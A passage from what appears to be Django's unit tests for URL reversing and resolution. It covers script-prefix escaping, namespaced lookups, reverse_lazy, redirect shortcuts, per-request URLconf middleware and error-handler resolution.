            reverse('non_path_include')
        )

    def test_prefix_parenthesis(self):
        # Parentheses are allowed and should not cause errors or be escaped
        with override_script_prefix('/bogus)/'):
            self.assertEqual(
                '/bogus)/includes/non_path_include/',
                reverse('non_path_include')
            )
        with override_script_prefix('/(bogus)/'):
            self.assertEqual(
                '/(bogus)/includes/non_path_include/',
                reverse('non_path_include')
            )

    @override_script_prefix('/bump%20map/')
    def test_prefix_format_char(self):
        # A literal % in the prefix is escaped (%25) rather than treated as a
        # format character.
        self.assertEqual(
            '/bump%2520map/includes/non_path_include/',
            reverse('non_path_include')
        )

    @override_script_prefix('/%7Eme/')
    def test_non_urlsafe_prefix_with_args(self):
        # Regression for #20022, adjusted for #24013 because ~ is an unreserved
        # character. Tests whether % is escaped.
        self.assertEqual('/%257Eme/places/1/', reverse('places', args=[1]))

    def test_patterns_reported(self):
        # Regression for #17076
        with self.assertRaisesMessage(NoReverseMatch, r"1 pattern(s) tried: ['people/(?P<name>\\w+)/$']"):
            # this url exists, but requires an argument
            reverse("people", args=[])

    @override_script_prefix('/script:name/')
    def test_script_name_escaping(self):
        # ':' is URL-safe and must survive both in the prefix and in args.
        self.assertEqual(
            reverse('optional', args=['foo:bar']),
            '/script:name/optional/foo:bar/'
        )

    def test_view_not_found_message(self):
        msg = (
            "Reverse for 'nonexistent-view' not found. 'nonexistent-view' "
            "is not a valid view function or pattern name."
        )
        with self.assertRaisesMessage(NoReverseMatch, msg):
            reverse('nonexistent-view')

    def test_no_args_message(self):
        msg = "Reverse for 'places' with no arguments not found. 1 pattern(s) tried:"
        with self.assertRaisesMessage(NoReverseMatch, msg):
            reverse('places')

    def test_illegal_args_message(self):
        msg = "Reverse for 'places' with arguments '(1, 2)' not found. 1 pattern(s) tried:"
        with self.assertRaisesMessage(NoReverseMatch, msg):
            reverse('places', args=(1, 2))

    def test_illegal_kwargs_message(self):
        msg = "Reverse for 'places' with keyword arguments '{'arg1': 2}' not found. 1 pattern(s) tried:"
        with self.assertRaisesMessage(NoReverseMatch, msg):
            reverse('places', kwargs={'arg1': 2})
class ResolverTests(SimpleTestCase):
    """Tests for URLResolver internals: repr, reverse, resolve failures."""

    def test_resolver_repr(self):
        """
        Test repr of URLResolver, especially when urlconf_name is a list
        (#17892).
        """
        # Pick a resolver from a namespaced URLconf
        resolver = get_resolver('urlpatterns_reverse.namespace_urls')
        sub_resolver = resolver.namespace_dict['test-ns1'][1]
        self.assertIn('<URLPattern list>', repr(sub_resolver))

    def test_reverse_lazy_object_coercion_by_resolve(self):
        """
        Verifies lazy object returned by reverse_lazy is coerced to
        text by resolve(). Previous to #21043, this would raise a TypeError.
        """
        urls = 'urlpatterns_reverse.named_urls'
        proxy_url = reverse_lazy('named-url1', urlconf=urls)
        resolver = get_resolver(urls)
        resolver.resolve(proxy_url)

    def test_resolver_reverse(self):
        resolver = get_resolver('urlpatterns_reverse.named_urls')
        test_urls = [
            # (name, args, kwargs, expected)
            ('named-url1', (), {}, ''),
            ('named-url2', ('arg',), {}, 'extra/arg/'),
            ('named-url2', (), {'extra': 'arg'}, 'extra/arg/'),
        ]
        for name, args, kwargs, expected in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs):
                self.assertEqual(resolver.reverse(name, *args, **kwargs), expected)

    def test_resolver_reverse_conflict(self):
        """
        url() name arguments don't need to be unique. The last registered
        pattern takes precedence for conflicting names.
        """
        resolver = get_resolver('urlpatterns_reverse.named_urls_conflict')
        test_urls = [
            # (name, args, kwargs, expected)
            # Without arguments, the last URL in urlpatterns has precedence.
            ('name-conflict', (), {}, 'conflict/'),
            # With an arg, the last URL in urlpatterns has precedence.
            ('name-conflict', ('arg',), {}, 'conflict-last/arg/'),
            # With a kwarg, other url()s can be reversed.
            ('name-conflict', (), {'first': 'arg'}, 'conflict-first/arg/'),
            ('name-conflict', (), {'middle': 'arg'}, 'conflict-middle/arg/'),
            ('name-conflict', (), {'last': 'arg'}, 'conflict-last/arg/'),
            # The number and order of the arguments don't interfere with reversing.
            ('name-conflict', ('arg', 'arg'), {}, 'conflict/arg/arg/'),
        ]
        for name, args, kwargs, expected in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs):
                self.assertEqual(resolver.reverse(name, *args, **kwargs), expected)

    def test_non_regex(self):
        """
        A Resolver404 is raised if resolving doesn't meet the basic
        requirements of a path to match - i.e., at the very least, it matches
        the root pattern '^/'. Never return None from resolve() to prevent a
        TypeError from occurring later (#10834).
        """
        test_urls = ['', 'a', '\\', '.']
        for path in test_urls:
            with self.subTest(path=path):
                with self.assertRaises(Resolver404):
                    resolve(path)

    def test_404_tried_urls_have_names(self):
        """
        The list of URLs that come back from a Resolver404 exception contains
        a list in the right format for printing out in the DEBUG 404 page with
        both the patterns and URL names, if available.
        """
        urls = 'urlpatterns_reverse.named_urls'
        # this list matches the expected URL types and names returned when
        # you try to resolve a nonexistent URL in the first level of included
        # URLs in named_urls.py (e.g., '/included/nonexistent-url')
        url_types_names = [
            [{'type': URLPattern, 'name': 'named-url1'}],
            [{'type': URLPattern, 'name': 'named-url2'}],
            [{'type': URLPattern, 'name': None}],
            [{'type': URLResolver}, {'type': URLPattern, 'name': 'named-url3'}],
            [{'type': URLResolver}, {'type': URLPattern, 'name': 'named-url4'}],
            [{'type': URLResolver}, {'type': URLPattern, 'name': None}],
            [{'type': URLResolver}, {'type': URLResolver}],
        ]
        with self.assertRaisesMessage(Resolver404, 'tried') as cm:
            resolve('/included/nonexistent-url', urlconf=urls)
        e = cm.exception
        # make sure we at least matched the root ('/') url resolver:
        self.assertIn('tried', e.args[0])
        self.assertEqual(
            len(e.args[0]['tried']),
            len(url_types_names),
            'Wrong number of tried URLs returned. Expected %s, got %s.' % (
                len(url_types_names), len(e.args[0]['tried'])
            )
        )
        # Loop variable renamed from `e` to `e_info` so it no longer shadows
        # the caught exception above.
        for tried, expected in zip(e.args[0]['tried'], url_types_names):
            for t, e_info in zip(tried, expected):
                with self.subTest(t):
                    # Bug fix: the failure message used to sit *outside* the
                    # assertIsInstance() call as a discarded tuple element
                    # (`self.assertIsInstance(...), 'msg'`), so it was never
                    # reported. Pass it as the msg argument instead.
                    self.assertIsInstance(
                        t, e_info['type'],
                        '%s is not an instance of %s' % (t, e_info['type']),
                    )
                    if 'name' in e_info:
                        if not e_info['name']:
                            self.assertIsNone(t.name, 'Expected no URL name but found %s.' % t.name)
                        else:
                            self.assertEqual(
                                t.name,
                                e_info['name'],
                                'Wrong URL name. Expected "%s", got "%s".' % (e_info['name'], t.name)
                            )

    def test_namespaced_view_detail(self):
        resolver = get_resolver('urlpatterns_reverse.nested_urls')
        self.assertTrue(resolver._is_callback('urlpatterns_reverse.nested_urls.view1'))
        self.assertTrue(resolver._is_callback('urlpatterns_reverse.nested_urls.view2'))
        self.assertTrue(resolver._is_callback('urlpatterns_reverse.nested_urls.View3'))
        self.assertFalse(resolver._is_callback('urlpatterns_reverse.nested_urls.blub'))

    def test_view_detail_as_method(self):
        # Views which have a class name as part of their path.
        resolver = get_resolver('urlpatterns_reverse.method_view_urls')
        self.assertTrue(resolver._is_callback('urlpatterns_reverse.method_view_urls.ViewContainer.method_view'))
        self.assertTrue(resolver._is_callback('urlpatterns_reverse.method_view_urls.ViewContainer.classmethod_view'))

    def test_populate_concurrency(self):
        """
        URLResolver._populate() can be called concurrently, but not more
        than once per thread (#26888).
        """
        resolver = URLResolver(RegexPattern(r'^/'), 'urlpatterns_reverse.urls')
        resolver._local.populating = True
        thread = threading.Thread(target=resolver._populate)
        thread.start()
        thread.join()
        self.assertNotEqual(resolver._reverse_dict, {})
@override_settings(ROOT_URLCONF='urlpatterns_reverse.reverse_lazy_urls')
class ReverseLazyTest(TestCase):
    def test_redirect_with_lazy_reverse(self):
        # A redirect whose target was built with reverse_lazy resolves fine.
        response = self.client.get('/redirect/')
        self.assertRedirects(response, "/redirected_to/", status_code=302)

    def test_user_permission_with_lazy_reverse(self):
        user = User.objects.create_user('alfred', 'alfred@example.com', password='testpw')
        # Anonymous access bounces to the (lazily reversed) login URL...
        response = self.client.get('/login_required_view/')
        self.assertRedirects(response, "/login/?next=/login_required_view/", status_code=302)
        # ...while an authenticated user gets through.
        self.client.force_login(user)
        response = self.client.get('/login_required_view/')
        self.assertEqual(response.status_code, 200)

    def test_inserting_reverse_lazy_into_string(self):
        # The lazy URL coerces to str under %-formatting.
        self.assertEqual(
            'Some URL: %s' % reverse_lazy('some-login-page'),
            'Some URL: /login/'
        )
class ReverseLazySettingsTest(AdminScriptTestCase):
    """
    reverse_lazy can be used in settings without causing a circular
    import error.
    """
    # Extra settings content that calls reverse_lazy() at import time.
    extra_settings = "from django.urls import reverse_lazy\nLOGIN_URL = reverse_lazy('login')"

    def setUp(self):
        self.write_settings('settings.py', extra=self.extra_settings)

    def tearDown(self):
        self.remove_settings('settings.py')

    def test_lazy_in_settings(self):
        out, err = self.run_manage(['check'])
        self.assertNoOutput(err)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls')
class ReverseShortcutTests(SimpleTestCase):
    """Tests for the redirect() shortcut and reversing views by reference."""

    def test_redirect_to_object(self):
        # Any object exposing get_absolute_url() works — no model required.
        class Target:
            def get_absolute_url(self):
                return "/hi-there/"

        res = redirect(Target())
        self.assertIsInstance(res, HttpResponseRedirect)
        self.assertEqual(res.url, '/hi-there/')
        res = redirect(Target(), permanent=True)
        self.assertIsInstance(res, HttpResponsePermanentRedirect)
        self.assertEqual(res.url, '/hi-there/')

    def test_redirect_to_view_name(self):
        self.assertEqual(redirect('hardcoded2').url, '/hardcoded/doc.pdf')
        self.assertEqual(redirect('places', 1).url, '/places/1/')
        self.assertEqual(
            redirect('headlines', year='2008', month='02', day='17').url,
            '/headlines/2008.02.17/',
        )
        with self.assertRaises(NoReverseMatch):
            redirect('not-a-view')

    def test_redirect_to_url(self):
        for target, expected in [
            ('/foo/', '/foo/'),
            ('http://example.com/', 'http://example.com/'),
            # UTF-8 targets are percent-encoded.
            ('/æøå/abc/', '/%C3%A6%C3%B8%C3%A5/abc/'),
            # A relative path must not trigger an import attempt (previously
            # this resolved in a UnicodeEncodeError from __import__).
            ('/æøå.abc/', '/%C3%A6%C3%B8%C3%A5.abc/'),
            ('os.path', 'os.path'),
        ]:
            self.assertEqual(redirect(target).url, expected)

    def test_no_illegal_imports(self):
        # Modules not listed in urlpatterns must not be imported as a side
        # effect of redirect().
        redirect("urlpatterns_reverse.nonimported_module.view")
        self.assertNotIn("urlpatterns_reverse.nonimported_module", sys.modules)

    def test_reverse_by_path_nested(self):
        # Views added to urlpatterns using include() should be reversible.
        from .views import nested_view
        self.assertEqual(reverse(nested_view), '/includes/nested_path/')

    def test_redirect_view_object(self):
        from .views import absolute_kwargs_view
        self.assertEqual(redirect(absolute_kwargs_view).url, '/absolute_arg_view/')
        with self.assertRaises(NoReverseMatch):
            redirect(absolute_kwargs_view, wrong_argument=None)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.namespace_urls')
class NamespaceTests(SimpleTestCase):
    # Table-driven tests of reverse() over namespaced URL names.  Each entry
    # is (name, args, kwargs[, current_app], expected) and is exercised in a
    # subTest so one failure doesn't mask the rest.

    def test_ambiguous_object(self):
        """
        Names deployed via dynamic URL objects that require namespaces can't
        be resolved.
        """
        test_urls = [
            ('urlobject-view', [], {}),
            ('urlobject-view', [37, 42], {}),
            ('urlobject-view', [], {'arg1': 42, 'arg2': 37}),
        ]
        for name, args, kwargs in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs):
                with self.assertRaises(NoReverseMatch):
                    reverse(name, args=args, kwargs=kwargs)

    def test_ambiguous_urlpattern(self):
        """
        Names deployed via dynamic URL objects that require namespaces can't
        be resolved.
        """
        test_urls = [
            ('inner-nothing', [], {}),
            ('inner-nothing', [37, 42], {}),
            ('inner-nothing', [], {'arg1': 42, 'arg2': 37}),
        ]
        for name, args, kwargs in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs):
                with self.assertRaises(NoReverseMatch):
                    reverse(name, args=args, kwargs=kwargs)

    def test_non_existent_namespace(self):
        """Nonexistent namespaces raise errors."""
        test_urls = [
            'blahblah:urlobject-view',
            'test-ns1:blahblah:urlobject-view',
        ]
        for name in test_urls:
            with self.subTest(name=name):
                with self.assertRaises(NoReverseMatch):
                    reverse(name)

    def test_normal_name(self):
        """Normal lookups work as expected."""
        test_urls = [
            ('normal-view', [], {}, '/normal/'),
            ('normal-view', [37, 42], {}, '/normal/37/42/'),
            ('normal-view', [], {'arg1': 42, 'arg2': 37}, '/normal/42/37/'),
            ('special-view', [], {}, '/+%5C$*/'),
        ]
        for name, args, kwargs, expected in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs):
                self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)

    def test_simple_included_name(self):
        """Normal lookups work on names included from other patterns."""
        test_urls = [
            ('included_namespace_urls:inc-normal-view', [], {}, '/included/normal/'),
            ('included_namespace_urls:inc-normal-view', [37, 42], {}, '/included/normal/37/42/'),
            ('included_namespace_urls:inc-normal-view', [], {'arg1': 42, 'arg2': 37}, '/included/normal/42/37/'),
            ('included_namespace_urls:inc-special-view', [], {}, '/included/+%5C$*/'),
        ]
        for name, args, kwargs, expected in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs):
                self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)

    def test_namespace_object(self):
        """Dynamic URL objects can be found using a namespace."""
        test_urls = [
            ('test-ns1:urlobject-view', [], {}, '/test1/inner/'),
            ('test-ns1:urlobject-view', [37, 42], {}, '/test1/inner/37/42/'),
            ('test-ns1:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/test1/inner/42/37/'),
            ('test-ns1:urlobject-special-view', [], {}, '/test1/inner/+%5C$*/'),
        ]
        for name, args, kwargs, expected in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs):
                self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)

    def test_app_object(self):
        """
        Dynamic URL objects can return a (pattern, app_name) 2-tuple, and
        include() can set the namespace.
        """
        test_urls = [
            ('new-ns1:urlobject-view', [], {}, '/newapp1/inner/'),
            ('new-ns1:urlobject-view', [37, 42], {}, '/newapp1/inner/37/42/'),
            ('new-ns1:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/newapp1/inner/42/37/'),
            ('new-ns1:urlobject-special-view', [], {}, '/newapp1/inner/+%5C$*/'),
        ]
        for name, args, kwargs, expected in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs):
                self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)

    def test_app_object_default_namespace(self):
        """
        Namespace defaults to app_name when including a (pattern, app_name)
        2-tuple.
        """
        test_urls = [
            ('newapp:urlobject-view', [], {}, '/new-default/inner/'),
            ('newapp:urlobject-view', [37, 42], {}, '/new-default/inner/37/42/'),
            ('newapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/new-default/inner/42/37/'),
            ('newapp:urlobject-special-view', [], {}, '/new-default/inner/+%5C$*/'),
        ]
        for name, args, kwargs, expected in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs):
                self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)

    def test_embedded_namespace_object(self):
        """Namespaces can be installed anywhere in the URL pattern tree."""
        test_urls = [
            ('included_namespace_urls:test-ns3:urlobject-view', [], {}, '/included/test3/inner/'),
            ('included_namespace_urls:test-ns3:urlobject-view', [37, 42], {}, '/included/test3/inner/37/42/'),
            (
                'included_namespace_urls:test-ns3:urlobject-view', [], {'arg1': 42, 'arg2': 37},
                '/included/test3/inner/42/37/',
            ),
            ('included_namespace_urls:test-ns3:urlobject-special-view', [], {}, '/included/test3/inner/+%5C$*/'),
        ]
        for name, args, kwargs, expected in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs):
                self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)

    def test_namespace_pattern(self):
        """Namespaces can be applied to include()'d urlpatterns."""
        test_urls = [
            ('inc-ns1:inc-normal-view', [], {}, '/ns-included1/normal/'),
            ('inc-ns1:inc-normal-view', [37, 42], {}, '/ns-included1/normal/37/42/'),
            ('inc-ns1:inc-normal-view', [], {'arg1': 42, 'arg2': 37}, '/ns-included1/normal/42/37/'),
            ('inc-ns1:inc-special-view', [], {}, '/ns-included1/+%5C$*/'),
        ]
        for name, args, kwargs, expected in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs):
                self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)

    def test_app_name_pattern(self):
        """
        Namespaces can be applied to include()'d urlpatterns that set an
        app_name attribute.
        """
        test_urls = [
            ('app-ns1:inc-normal-view', [], {}, '/app-included1/normal/'),
            ('app-ns1:inc-normal-view', [37, 42], {}, '/app-included1/normal/37/42/'),
            ('app-ns1:inc-normal-view', [], {'arg1': 42, 'arg2': 37}, '/app-included1/normal/42/37/'),
            ('app-ns1:inc-special-view', [], {}, '/app-included1/+%5C$*/'),
        ]
        for name, args, kwargs, expected in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs):
                self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)

    def test_namespace_pattern_with_variable_prefix(self):
        """
        Using include() with namespaces when there is a regex variable in front
        of it.
        """
        # The prefix variable ("outer") may be supplied positionally or by
        # keyword, mixed with the inner view's own arguments.
        test_urls = [
            ('inc-outer:inc-normal-view', [], {'outer': 42}, '/ns-outer/42/normal/'),
            ('inc-outer:inc-normal-view', [42], {}, '/ns-outer/42/normal/'),
            ('inc-outer:inc-normal-view', [], {'arg1': 37, 'arg2': 4, 'outer': 42}, '/ns-outer/42/normal/37/4/'),
            ('inc-outer:inc-normal-view', [42, 37, 4], {}, '/ns-outer/42/normal/37/4/'),
            ('inc-outer:inc-special-view', [], {'outer': 42}, '/ns-outer/42/+%5C$*/'),
            ('inc-outer:inc-special-view', [42], {}, '/ns-outer/42/+%5C$*/'),
        ]
        for name, args, kwargs, expected in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs):
                self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)

    def test_multiple_namespace_pattern(self):
        """Namespaces can be embedded."""
        test_urls = [
            ('inc-ns1:test-ns3:urlobject-view', [], {}, '/ns-included1/test3/inner/'),
            ('inc-ns1:test-ns3:urlobject-view', [37, 42], {}, '/ns-included1/test3/inner/37/42/'),
            (
                'inc-ns1:test-ns3:urlobject-view', [], {'arg1': 42, 'arg2': 37},
                '/ns-included1/test3/inner/42/37/',
            ),
            ('inc-ns1:test-ns3:urlobject-special-view', [], {}, '/ns-included1/test3/inner/+%5C$*/'),
        ]
        for name, args, kwargs, expected in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs):
                self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)

    def test_nested_namespace_pattern(self):
        """Namespaces can be nested."""
        test_urls = [
            (
                'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', [], {},
                '/ns-included1/ns-included4/ns-included1/test3/inner/',
            ),
            (
                'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', [37, 42], {},
                '/ns-included1/ns-included4/ns-included1/test3/inner/37/42/',
            ),
            (
                'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', [], {'arg1': 42, 'arg2': 37},
                '/ns-included1/ns-included4/ns-included1/test3/inner/42/37/',
            ),
            (
                'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-special-view', [], {},
                '/ns-included1/ns-included4/ns-included1/test3/inner/+%5C$*/',
            ),
        ]
        for name, args, kwargs, expected in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs):
                self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)

    def test_app_lookup_object(self):
        """A default application namespace can be used for lookup."""
        test_urls = [
            ('testapp:urlobject-view', [], {}, '/default/inner/'),
            ('testapp:urlobject-view', [37, 42], {}, '/default/inner/37/42/'),
            ('testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/default/inner/42/37/'),
            ('testapp:urlobject-special-view', [], {}, '/default/inner/+%5C$*/'),
        ]
        for name, args, kwargs, expected in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs):
                self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)

    def test_app_lookup_object_with_default(self):
        """A default application namespace is sensitive to the current app."""
        test_urls = [
            ('testapp:urlobject-view', [], {}, 'test-ns3', '/default/inner/'),
            ('testapp:urlobject-view', [37, 42], {}, 'test-ns3', '/default/inner/37/42/'),
            ('testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'test-ns3', '/default/inner/42/37/'),
            ('testapp:urlobject-special-view', [], {}, 'test-ns3', '/default/inner/+%5C$*/'),
        ]
        for name, args, kwargs, current_app, expected in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
                self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)

    def test_app_lookup_object_without_default(self):
        """
        An application namespace without a default is sensitive to the current
        app.
        """
        test_urls = [
            ('nodefault:urlobject-view', [], {}, None, '/other2/inner/'),
            ('nodefault:urlobject-view', [37, 42], {}, None, '/other2/inner/37/42/'),
            ('nodefault:urlobject-view', [], {'arg1': 42, 'arg2': 37}, None, '/other2/inner/42/37/'),
            ('nodefault:urlobject-special-view', [], {}, None, '/other2/inner/+%5C$*/'),
            ('nodefault:urlobject-view', [], {}, 'other-ns1', '/other1/inner/'),
            ('nodefault:urlobject-view', [37, 42], {}, 'other-ns1', '/other1/inner/37/42/'),
            ('nodefault:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'other-ns1', '/other1/inner/42/37/'),
            ('nodefault:urlobject-special-view', [], {}, 'other-ns1', '/other1/inner/+%5C$*/'),
        ]
        for name, args, kwargs, current_app, expected in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
                self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)

    def test_special_chars_namespace(self):
        # Regex special characters in an instance namespace's prefix are
        # percent-encoded in the reversed URL.
        test_urls = [
            ('special:included_namespace_urls:inc-normal-view', [], {}, '/+%5C$*/included/normal/'),
            ('special:included_namespace_urls:inc-normal-view', [37, 42], {}, '/+%5C$*/included/normal/37/42/'),
            (
                'special:included_namespace_urls:inc-normal-view', [], {'arg1': 42, 'arg2': 37},
                '/+%5C$*/included/normal/42/37/',
            ),
            ('special:included_namespace_urls:inc-special-view', [], {}, '/+%5C$*/included/+%5C$*/'),
        ]
        for name, args, kwargs, expected in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs):
                self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)

    def test_namespaces_with_variables(self):
        """Namespace prefixes can capture variables."""
        test_urls = [
            ('inc-ns5:inner-nothing', [], {'outer': '70'}, '/inc70/'),
            ('inc-ns5:inner-extra', [], {'extra': 'foobar', 'outer': '78'}, '/inc78/extra/foobar/'),
            ('inc-ns5:inner-nothing', ['70'], {}, '/inc70/'),
            ('inc-ns5:inner-extra', ['78', 'foobar'], {}, '/inc78/extra/foobar/'),
        ]
        for name, args, kwargs, expected in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs):
                self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)

    def test_nested_app_lookup(self):
        """
        A nested current_app should be split in individual namespaces (#24904).
        """
        test_urls = [
            ('inc-ns1:testapp:urlobject-view', [], {}, None, '/ns-included1/test4/inner/'),
            ('inc-ns1:testapp:urlobject-view', [37, 42], {}, None, '/ns-included1/test4/inner/37/42/'),
            ('inc-ns1:testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, None, '/ns-included1/test4/inner/42/37/'),
            ('inc-ns1:testapp:urlobject-special-view', [], {}, None, '/ns-included1/test4/inner/+%5C$*/'),
            ('inc-ns1:testapp:urlobject-view', [], {}, 'inc-ns1:test-ns3', '/ns-included1/test3/inner/'),
            ('inc-ns1:testapp:urlobject-view', [37, 42], {}, 'inc-ns1:test-ns3', '/ns-included1/test3/inner/37/42/'),
            (
                'inc-ns1:testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'inc-ns1:test-ns3',
                '/ns-included1/test3/inner/42/37/',
            ),
            (
                'inc-ns1:testapp:urlobject-special-view', [], {}, 'inc-ns1:test-ns3',
                '/ns-included1/test3/inner/+%5C$*/',
            ),
        ]
        for name, args, kwargs, current_app, expected in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
                self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)

    def test_current_app_no_partial_match(self):
        """current_app shouldn't be used unless it matches the whole path."""
        test_urls = [
            ('inc-ns1:testapp:urlobject-view', [], {}, 'nonexistent:test-ns3', '/ns-included1/test4/inner/'),
            (
                'inc-ns1:testapp:urlobject-view', [37, 42], {}, 'nonexistent:test-ns3',
                '/ns-included1/test4/inner/37/42/',
            ),
            (
                'inc-ns1:testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'nonexistent:test-ns3',
                '/ns-included1/test4/inner/42/37/',
            ),
            (
                'inc-ns1:testapp:urlobject-special-view', [], {}, 'nonexistent:test-ns3',
                '/ns-included1/test4/inner/+%5C$*/',
            ),
        ]
        for name, args, kwargs, current_app, expected in test_urls:
            with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
                self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
@override_settings(ROOT_URLCONF=urlconf_outer.__name__)
class RequestURLconfTests(SimpleTestCase):
    # Tests for per-request URLconf overriding (request.urlconf), driven by
    # the middleware classes referenced in the MIDDLEWARE overrides below.

    def test_urlconf(self):
        # With no middleware, only the default (outer) URLconf resolves.
        response = self.client.get('/test/me/')
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.content, b'outer:/test/me/,inner:/inner_urlconf/second_test/')
        response = self.client.get('/inner_urlconf/second_test/')
        self.assertEqual(response.status_code, 200)
        response = self.client.get('/second_test/')
        self.assertEqual(response.status_code, 404)

    @override_settings(
        MIDDLEWARE=[
            '%s.ChangeURLconfMiddleware' % middleware.__name__,
        ]
    )
    def test_urlconf_overridden(self):
        # The overriding middleware swaps in the inner URLconf, so the
        # default routes stop resolving.
        response = self.client.get('/test/me/')
        self.assertEqual(response.status_code, 404)
        response = self.client.get('/inner_urlconf/second_test/')
        self.assertEqual(response.status_code, 404)
        response = self.client.get('/second_test/')
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.content, b'outer:,inner:/second_test/')

    @override_settings(
        MIDDLEWARE=[
            '%s.NullChangeURLconfMiddleware' % middleware.__name__,
        ]
    )
    def test_urlconf_overridden_with_null(self):
        """
        Overriding request.urlconf with None will fall back to the default
        URLconf.
        """
        response = self.client.get('/test/me/')
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.content, b'outer:/test/me/,inner:/inner_urlconf/second_test/')
        response = self.client.get('/inner_urlconf/second_test/')
        self.assertEqual(response.status_code, 200)
        response = self.client.get('/second_test/')
        self.assertEqual(response.status_code, 404)

    @override_settings(
        MIDDLEWARE=[
            '%s.ChangeURLconfMiddleware' % middleware.__name__,
            '%s.ReverseInnerInResponseMiddleware' % middleware.__name__,
        ]
    )
    def test_reverse_inner_in_response_middleware(self):
        """
        Test reversing an URL from the *overridden* URLconf from inside
        a response middleware.
        """
        response = self.client.get('/second_test/')
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.content, b'/second_test/')

    @override_settings(
        MIDDLEWARE=[
            '%s.ChangeURLconfMiddleware' % middleware.__name__,
            '%s.ReverseOuterInResponseMiddleware' % middleware.__name__,
        ]
    )
    def test_reverse_outer_in_response_middleware(self):
        """
        Test reversing an URL from the *default* URLconf from inside
        a response middleware.
        """
        message = "Reverse for 'outer' not found."
        with self.assertRaisesMessage(NoReverseMatch, message):
            self.client.get('/second_test/')

    @override_settings(
        MIDDLEWARE=[
            '%s.ChangeURLconfMiddleware' % middleware.__name__,
            '%s.ReverseInnerInStreaming' % middleware.__name__,
        ]
    )
    def test_reverse_inner_in_streaming(self):
        """
        Test reversing an URL from the *overridden* URLconf from inside
        a streaming response.
        """
        response = self.client.get('/second_test/')
        self.assertEqual(response.status_code, 200)
        self.assertEqual(b''.join(response), b'/second_test/')

    @override_settings(
        MIDDLEWARE=[
            '%s.ChangeURLconfMiddleware' % middleware.__name__,
            '%s.ReverseOuterInStreaming' % middleware.__name__,
        ]
    )
    def test_reverse_outer_in_streaming(self):
        """
        Test reversing an URL from the *default* URLconf from inside
        a streaming response.
        """
        message = "Reverse for 'outer' not found."
        with self.assertRaisesMessage(NoReverseMatch, message):
            self.client.get('/second_test/')
            # Consuming the stream is what triggers the reverse() call.
            b''.join(self.client.get('/second_test/'))

    def test_urlconf_is_reset_after_request(self):
        """The URLconf is reset after each request."""
        self.assertIsNone(get_urlconf())
        with override_settings(MIDDLEWARE=['%s.ChangeURLconfMiddleware' % middleware.__name__]):
            self.client.get(reverse('inner'))
        self.assertIsNone(get_urlconf())
class ErrorHandlerResolutionTests(SimpleTestCase):
    """Tests for handler400, handler404 and handler500"""

    def setUp(self):
        # One URLconf names its handlers by dotted path, the other supplies
        # callables directly; both should resolve identically.
        self.resolver = URLResolver(
            RegexPattern(r'^$'), 'urlpatterns_reverse.urls_error_handlers'
        )
        self.callable_resolver = URLResolver(
            RegexPattern(r'^$'), 'urlpatterns_reverse.urls_error_handlers_callables'
        )

    def test_named_handlers(self):
        expected = (empty_view, {})
        for code in (400, 404, 500):
            with self.subTest(code=code):
                self.assertEqual(self.resolver.resolve_error_handler(code), expected)

    def test_callable_handlers(self):
        expected = (empty_view, {})
        for code in (400, 404, 500):
            with self.subTest(code=code):
